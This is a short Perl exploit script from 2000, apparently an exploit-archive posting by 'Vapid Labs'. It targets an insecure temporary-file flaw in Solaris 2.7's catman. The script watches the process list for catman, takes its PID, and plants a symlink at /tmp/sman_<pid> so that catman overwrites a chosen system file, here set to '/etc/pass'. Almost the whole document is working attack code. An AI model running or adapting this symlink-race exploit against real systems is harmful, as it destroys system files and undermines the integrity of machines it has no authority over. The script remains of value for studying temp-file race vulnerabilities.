#!/usr/local/bin/perl -w 
# The problem is catman creates files in /tmp insecurly. They are based on the PID of the catman
# process,  catman will happily clobber any files that are symlinked to that file.
# The idea of this script is to watch the process list for the catman process, 
# get the pid and Create a symlink in /tmp to our file to be
# clobbered.  This exploit depends on system speed and process load.   
# This worked on a patched Solaris 2.7 box (August 2000 patch cluster)
# SunOS rootabega 5.7 Generic_106541-12 sun4u sparc SUNW,Ultra-1
# lwc@vapid.betteros.org   11/21/2000   Vapid Labs.
# http://vapid.betteros.org



$clobber = "/etc/pass";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";

while(<ps>) {
@args = split " ", $_;

if (/catman/) { 
	print "Symlinking sman_$args[1] to  $clobber\n";
	symlink($clobber,"/tmp/sman_$args[1]");
	exit(1);
   }
 }

}